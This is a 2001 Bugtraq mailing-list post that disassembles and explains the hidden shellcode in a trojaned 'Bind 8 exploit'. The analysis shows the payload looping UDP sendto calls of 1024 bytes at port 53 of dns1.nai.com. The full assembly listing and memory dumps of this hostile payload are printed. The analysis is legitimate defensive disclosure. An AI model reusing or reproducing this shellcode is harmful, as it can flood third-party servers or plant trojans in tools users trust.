[18926] in bugtraq
Re: Bind 8 Exploit - Trojan
daemon@ATHENA.MIT.EDU (Sergei)
Thu Feb 1 14:06:02 2001
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.10102011556280.16846-100000@mole.nixu.fi>
Date: Thu, 1 Feb 2001 16:01:24 +0200
Reply-To: Sergei <Sergei.Ledovskij@NIXU.FI>
From: Sergei <Sergei.Ledovskij@NIXU.FI>
To: BUGTRAQ@SECURITYFOCUS.COM
Analyzis of the bind8 trojaned exploit
--------------------------------------
here's the code:
0x8049540 <shellcode>: jmp 0x8049576 <shellcode+54>
0x8049542 <shellcode+2>: pop %esi
0x8049543 <shellcode+3>: mov $0x1,%ebx
0x8049548 <shellcode+8>: mov %esi,%ecx
0x804954a <shellcode+10>: mov $0x66,%eax
0x804954f <shellcode+15>: int $0x80
0x8049551 <shellcode+17>: mov %eax,0x14(%esi)
0x8049554 <shellcode+20>: lea 0x30(%esi),%eax
0x8049557 <shellcode+23>: mov %eax,0x18(%esi)
0x804955a <shellcode+26>: xor %eax,%eax
0x804955c <shellcode+28>: mov %eax,0x20(%esi)
0x804955f <shellcode+31>: lea 0xc(%esi),%eax
0x8049562 <shellcode+34>: mov %eax,0x24(%esi)
0x8049565 <shellcode+37>: mov $0x66,%eax
0x804956a <shellcode+42>: mov $0xb,%ebx
0x804956f <shellcode+47>: lea 0x14(%esi),%ecx
0x8049572 <shellcode+50>: int $0x80
0x8049574 <shellcode+52>: jmp 0x8049565 <shellcode+37>
0x8049576 <shellcode+54>: call 0x8049542 <shellcode+2>
here's what it does:
<shellcode>: jmp 0x8049576 <shellcode+54>
<shellcode+2>: pop %esi
address of data into %esi
<shellcode+3>: mov $0x1,%ebx
<shellcode+8>: mov %esi,%ecx
<shellcode+10>: mov $0x66,%eax
<shellcode+15>: int $0x80
eax = 0x66 (102 is the syscall number of socketcall)
ebx = 0x1 (1 is the call number of sys_socket)
ecx = shellcode+59 (address of args)
(gdb) x/3 shellcode+59
<shellcode+59>: 0x00000002 0x00000002 0x00000011
family = 2 (AF_INET, <linux/socket.h>)
type = 2 (SOCK_DGRAM, <asm/socket.h>)
protocol = 0x11 (17, UDP, <linux/in.h>)
socket descriptor is returned in %eax
<shellcode+17>: mov %eax,0x14(%esi)
store the descriptor at shellcode+79
<shellcode+20>: lea 0x30(%esi),%eax
get address of shellcode+107 (beginning of the actual exploit code) into %eax
<shellcode+23>: mov %eax,0x18(%esi)
store that address in shellcode+83
<shellcode+26>: xor %eax,%eax
zero out eax
<shellcode+28>: mov %eax,0x20(%esi)
store that zero into shellcode+91 (this are flags, but read on)
<shellcode+31>: lea 0xc(%esi),%eax
get address of shellcode+71 (struct sockaddr for sendto, but read on) into %eax
<shellcode+34>: mov %eax,0x24(%esi)
store that address into shellcode+95
<shellcode+37>: mov $0x66,%eax
<shellcode+42>: mov $0xb,%ebx
<shellcode+47>: lea 0x14(%esi),%ecx
eax = 0x66 (102 is the syscall number of socketcall)
ebx = 0xb (11 is the call number of sys_sendto)
ecx = shellcode+79 (address of args)
args are (int fs, void *buff, size_t len, unsigned flags, struct sockaddr *addr, int addr_len),
thus:
fs = [shellcode+79] = value received from socket call (socket descriptor)
buff = [shellcode+83] = shellcode+107 = that's where actual exploit code is stored i presume
len = [shellcode+87] = 0x400, send 1024 chars
(gdb) x/1 shellcode+87
<shellcode+87>: 0x00000400
flags = [shellcode+91] = 0, no special flags
addr = [shellcode+95] = shellcode+71, this is struct sockaddr_in
(gdb) x/10 shellcode+71
<shellcode+71>: 0x35000002 0x960345a1 0xffffffff 0xffffffef
<shellcode+87>: 0x00000400 0x00000000 0x809a5f02 0x00000010
<shellcode+103>: 0x6e69622f 0x0068732f
struct sockaddr_in {
sa_family_t sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
...
};
thus:
sin_family = 0x0002 (AF_INET)
sin_port = 0x3500 (or in host order 0x0035, which is 53)
sin_addr = 0x 96 03 45 a1 (nothing other than 161.69.3.150, dns1.nai.com)
addr_len = [shellcode+99] = 0x10 (16 bytes, the length of struct sockaddr)
<shellcode+50>: int $0x80
do the thing
<shellcode+52>: jmp 0x8049565 <shellcode+37>
loop sys_sendto()
<shellcode+54>: call 0x8049542 <shellcode+2>
call used to get the address of data (we jump here in the beginning)
<shellcode+59>:
data starts here..
Lesson:
-------
Use the force, read the source!
--
Sergei Ledovskij +358(40)8245708 solid@nixu.fi
Makelankatu 91 PO. 21 Helsinki 00601 Finland
